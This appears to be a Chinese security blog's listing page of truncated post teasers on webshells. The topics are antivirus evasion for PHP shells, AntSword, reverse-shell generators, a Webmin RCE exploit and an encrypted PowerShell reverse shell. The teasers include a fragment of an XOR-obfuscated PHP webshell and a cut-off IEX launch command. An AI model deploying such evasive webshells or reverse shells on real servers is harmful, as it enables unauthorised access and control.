shell

回调函数绕过D盾查杀常见的PHPshell回调函数如下：call_user_func_array() call_user_func() array_udiff() array_filter() array_walk() array_map() array_reduce() array_walk_recursive() regist...

AntSword User-Agent很多人用蚁剑其实都是默认配置就用了，所以默认就带有User-Agent: antSword/v2.0，日志溯源一目了然，WAF更好识别。不过蚁剑在添加shell的时候也提供了自定义的header头功能，但是用起来...

disable_functions为了安全，运维人员会禁用PHP的一些“危险”函数，例如：dl,eval,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv...

revshellgen反弹shell生成器独立的python shell生成脚本，用于轻松生成反弹shell，并自动化无聊的东西，如URL编码命令和设置监听器等。revshellgen反弹shell生成器revshellgen安装与使用安装...

oracleShell一款简约实用的Oracle数据库命令执行工具，基于java开发，所以是跨平台的，值得收藏。它有命令执行/文件管理/反弹shell的功能，所以你也可以把它当做shell管理工具来使用。截图...

EDB-ID: 47230CVE-2019-15107本日由 Vendor 在@defcon AppSec Village 发布，修复了这个漏洞。 Webmin 必须更新到1.930版本。Exploit-DB LinkCVE-Mitre LinkDownload defcon_webmin_unauth_rce.rb (Meta...

免杀PHP一句话shell，利用随机异或免杀D盾，免杀安全狗护卫神等<?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; ...

p0wny @hell：单文件PHP Shellp0wny @hell 是一个非常基本的单文件PHP shell。当测试PHP应用程序时，它可用于在服务器上快速执行命令。请谨慎使用：此脚本表示服务器存在安全风险，它是类似于webshell的脚本...

以下情况可能造成Linux内存占用过高服务配置存在直接分配错误，或隐性分配不合理等程序有BUG被恶意流量数据包攻击资源配置与流量不科学都会造成服务器内存占用过高，出现访问延迟高，速度慢甚至挂机...

ReverseTCPShell 反弹加密shell一个通过TCP加密（AES 256位）反弹Shell的工具，使用PowerShell。使用攻击方 (C2-Server 监听)：PS> .\ReverseTCP.ps1目标 (客户端)：ECHO IEX([string](...